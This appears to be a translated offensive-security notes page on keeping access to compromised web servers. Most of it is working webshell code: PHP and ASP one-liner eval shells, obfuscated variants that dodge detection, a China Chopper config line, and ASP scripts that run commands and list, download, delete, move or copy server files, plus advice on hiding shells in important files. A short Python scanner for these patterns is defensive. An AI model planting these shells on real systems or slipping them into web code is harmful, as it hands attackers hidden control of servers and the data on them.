Maintaining Access
WebShell
A large webshell is usually deleted once the administrator notices it, so upload some hidden one-liner shells, or scripts with only simple functionality.
If there is a neighbouring site on the same server, insert the WebShell into that site. A one-liner can be inserted into certain important files.
When inserting it, it is best to add a check, which prevents errors:
<?php if(isset($_POST['1'])){eval($_POST['1']);}?>
ASP
File extensions
ashx asp aspx ascx asmx
Ways to bypass detection
If wscript.xxxxxx cannot be used, the object can be called via its classID; note that the classID differs between versions.
<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
One-liners
Ordinary one-liners
<%eval request("MH")%>
<%eval request(chr(35))%>
<%IfRequest("1")<>""ThenExecuteGlobal(Request("1"))%>
An encoded one-liner, although eval has still not been removed:
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
Using the fact that <%%> and <script language=javascript runat=server></script> are essentially equivalent, the percent signs can be removed.
Using VBS encoding
<script language=vbs runat=server>
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
HextoStr="EXECUTE """""
C="&CHR(&H"
N=")"
Do While Len(data)>1
If IsNumeric(Left(data,1)) Then
HextoStr=HextoStr&C&Left(data,2)&N
data=Mid(data,3)
Else
HextoStr=HextoStr&C&Left(data,4)&N
data=Mid(data,5)
End If
Loop
End Function
</script>
Using JS encoding
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode(
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>
Using ScriptControl; this has not been tested carefully
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) ' the SubCode parameter supplies the procedure code
o.run "e",Server,Response,Request,Application,Session,Error ' call the procedure named e, pushing the 6 base objects as arguments
%>
Enter in the URL:
http://localhost/tmp.asp?
SubCode=sub e(Server,Response,Request,Application,Session,Error) eval(request("v")) end sub&v=response.write(server.mappath("tmp.asp"))
Or write the following into the China Chopper (菜刀) configuration:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
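From the defensive side, every variant above still has to hand request input to eval/execute, reach WScript.Shell (by ProgID or by the CLSID quoted above), or instantiate ScriptControl. The following Python scanner is an added example, not code from the original page: it undoes the three encodings shown here (String.fromCharCode, the HextoStr hex rule, and "e"&"v"&"a"&"l" concatenation), normalizes case and whitespace, and then matches those indicators against constructed samples modelled on the fragments above; the indicator names and sample set are assumptions.

```python
import re

# Constructed samples modelled on the ASP fragments above, plus one benign line.
SAMPLES = {
    "plain": '<%eval request("MH")%>',
    "ifexec": '<%IfRequest("1")<>""ThenExecuteGlobal(Request("1"))%>',
    "concat": '<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&")"&")")%>',
    "hex": 'Execute(HextoStr("65786563757465287265717565737428636872283335292929"))',
    "js": '<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode(116,114,121,'
          '123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,'
          '41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>',
    "classid": '<ObjEct runat=sErvEr iD=kk scOpE=pagE '
               'classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>',
    "progid": '<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>',
    "benign": '<% Response.Write Server.HTMLEncode(Request("name")) %>',
}

# Indicators matched against normalized text; the CLSID is the one the page uses for WScript.Shell.
INDICATORS = {
    "eval/execute of request input": r"(?:eval|execute|executeglobal)\(?request",
    "WScript.Shell via CLSID": r"clsid:72c24dd5-d70a-438b-8a42-98424b88afb8",
    "shell/script object by ProgID": r'createobject\("(?:wscript\.shell|scriptcontrol)"',
}

def hextostr(data: str) -> str:
    """Same rule as the page's HextoStr: a chunk is 2 hex digits when it starts
    with a decimal digit, otherwise 4 (a UTF-16 code unit)."""
    out = []
    while len(data) > 1:
        width = 2 if data[0].isdigit() else 4
        out.append(chr(int(data[:width], 16)))
        data = data[width:]
    return "".join(out)

def normalize(src: str) -> str:
    """Undo the three encodings shown above, then lowercase and drop whitespace."""
    # String.fromCharCode(116,114,...) -> the text it builds
    src = re.sub(r"String\.fromCharCode\(([\d\s,]+)\)",
                 lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))), src)
    # "6578..." hex literal (HextoStr input) -> decoded text
    src = re.sub(r'"([0-9A-Fa-f]{8,})"', lambda m: hextostr(m.group(1)), src)
    # "e"&"v"&"a"&"l" -> "eval"
    src = re.sub(r'"\s*&\s*"', "", src)
    return re.sub(r"\s+", "", src).lower()

def scan(src: str) -> list:
    norm = normalize(src)  # names of all indicators present after decoding
    return [name for name, pat in INDICATORS.items() if re.search(pat, norm)]
```

Run scan() over each SAMPLES entry: every encoded shell variant reports the eval/execute indicator, the classid and progid samples report their object indicators, and the benign line reports nothing.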
Directory listing
<%@ Language=vbscript %>
<%
' function that walks a directory and the files under it
%>
<%
Function Bianli(path,Recursion)
Set Fso=server.createobject("scripting.filesystemobject")
On Error Resume Next
Set Objfolder=fso.getfolder(path)
Set Objsubfolders=Objfolder.subfolders
Set Objfile = Objfolder.Files
Response.write path
For Each file in Objfile
Response.write "<br>---"
Response.write file.name
Next
For Each Objsubfolder In Objsubfolders
Response.write "<p>"
if Recursion<>0 then
call Bianli(path+"\"+Objsubfolder.name,Recursion) ' recurse
end if
Next
Set Objfolder=nothing
Set Objsubfolders=nothing
Set Fso=nothing
End Function
%>
<%
dim path,Recursion
path = request("path")
Recursion = request("Recursion")
call Bianli(path,Recursion) ' walk the requested path, e.g. the D: drive
%>
<html>
<p>Testing...</p>
</html>
Download a file
<%@ language=vbscript codepage=65001%>
<%
'Filename must be input
if Request("Filename")="" then
response.write "<h1>Error:</h1>Filename is empty!<p>"
else
call downloadFile(Request("Filename"))
Function downloadFile(strFile)
' make sure you are on the latest MDAC version for this to work
' get full path of specified file
'strFilename = server.MapPath(strFile)
strFilename = strFile
' clear the buffer
Response.Buffer = True
Response.Clear
' create stream
Set s = Server.CreateObject("ADODB.Stream")
s.Open
' Set as binary
s.Type = 1
' load in the file
on error resume next
' check the file exists
Set fso = Server.CreateObject("Scripting.FileSystemObject")
if not fso.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>"&strFilename&" does not exist!<p>")
Response.End
end if
' get length of file
Set f = fso.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>Unknown Error!<p>")
Response.End
end if
' send the headers to the user's browser
Response.AddHeader "Content-Disposition","attachment; filename="&f.name
Response.AddHeader "Content-Length",intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
' output the file to the browser
Response.BinaryWrite s.Read
Response.Flush
' tidy up
s.Close
Set s = Nothing
End Function
end if
%>
Execute a command
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
If you upload your own cmd.exe, write it like this:
<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>
Delete a file
<%
filepath=request("path")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(filepath)
Set fso = nothing
%>
Rename a file
<%
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(request("path"))
f.name =request("filename")
newname=f.name
response.write "已更名为"&newname
%>
Move a file
<%
dim fso
set fso = server.createobject("scripting.filesystemobject")
fso.movefolder request("name1"),request("name2")
set fso = nothing
%>
Copy a file
<%
dim MyFSO
set MyFSO=Server.CreateObject("Scripting.FileSystemObject")
MyFSO.CopyFile request("name1"),request("name2")
set MyFSO=nothing
%>